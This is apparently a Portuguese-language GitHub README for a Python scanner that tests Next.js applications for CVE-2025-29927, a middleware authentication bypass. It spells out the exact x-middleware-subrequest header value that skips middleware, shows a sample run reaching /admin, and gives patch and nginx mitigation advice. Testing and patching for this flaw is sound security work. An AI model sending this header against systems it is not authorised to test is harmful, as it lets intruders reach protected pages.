
🔐 Python-based smart scanner for CVE-2025-29927 — Next.js middleware authentication bypass vulnerability. Detects meta refresh, keyword-based redirects, and more.
Este scanner inteligente baseado em Python ajuda a detectar a vulnerabilidade CVE-2025-29927 em aplicações Next.js — um bypass crítico de middleware que permite que atacantes ignorem a autenticação usando um cabeçalho HTTP manipulado.
🧠 A ferramenta identifica não apenas redirecionamentos HTTP, mas também mecanismos de redirecionamento do lado do cliente, como
<meta http-equiv="refresh">, redirecionamentos baseados em palavras-chave de login e bypasses silenciosos de autenticação.
x-middleware-subrequest<meta refresh>login, sign in, authentication$ python3 CVE-2025-29927.py
🌐 Digite a URL do site alvo (ex: http://localhost:3000): http://vulnerable.local
📁 Digite o caminho protegido (ex: /dashboard): /admin
→ Testando com cabeçalho: middleware:middleware:middleware:middleware:middleware
↳ Status HTTP: 200
↳ Redirecionamento detectado: Não
✅ VULNERÁVEL! Bypass bem-sucedido com cabeçalho:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Scanner interativo principal
├── requirements.txt # Dependências Python
└── README.md # Este arquivo
requests
beautifulsoup4
colorama
Se sua aplicação for afetada, faça o seguinte:
v15.2.3 ou superior (ou 14.2.25+ / 13.5.7+)proxy_set_header x-middleware-subrequest "";
A CVE-2025-29927 permite que atacantes ignorem as verificações de middleware do Next.js manipulando o cabeçalho x-middleware-subrequest com valores manipulados, como:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
Em versões vulneráveis, isso desativa completamente a execução do middleware — permitindo acesso direto a rotas protegidas como /dashboard, /admin, etc.
Mantido por: @mrzblackhat
Sinta-se à vontade para entrar em contato comigo no Telegram para sugestões, melhorias ou contribuições.
next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking
Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. Use com responsabilidade.